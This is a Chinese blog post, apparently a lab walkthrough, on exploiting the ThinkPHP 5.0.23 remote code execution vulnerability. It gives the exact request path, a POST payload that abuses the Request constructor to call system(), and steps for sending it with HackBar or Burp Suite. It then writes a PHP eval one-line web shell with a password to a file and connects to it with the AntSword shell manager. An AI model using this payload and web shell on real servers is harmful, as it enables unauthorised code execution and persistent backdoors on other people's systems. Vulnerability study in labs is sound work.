ThinkPHP5.0.23 远程代码执行漏洞
2023-03-29 23:03:03
147
{{single.collect_count}}

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
在这里插入图片描述
百度漏洞
在这里插入图片描述
获得exp
路径:

index.php?s=captcha

POST传参 我用的是hackbar,用burpsuite也行。

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

在这里插入图片描述
burp操作方法
抓包 右键改为post请求
在这里插入图片描述
exp如下图所示填入
在这里插入图片描述
在这里插入图片描述
写入一句话

echo '<?php eval($_POST[666]); ?>' > 666.php #密码666

上蚁剑
在这里插入图片描述
在这里插入图片描述

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}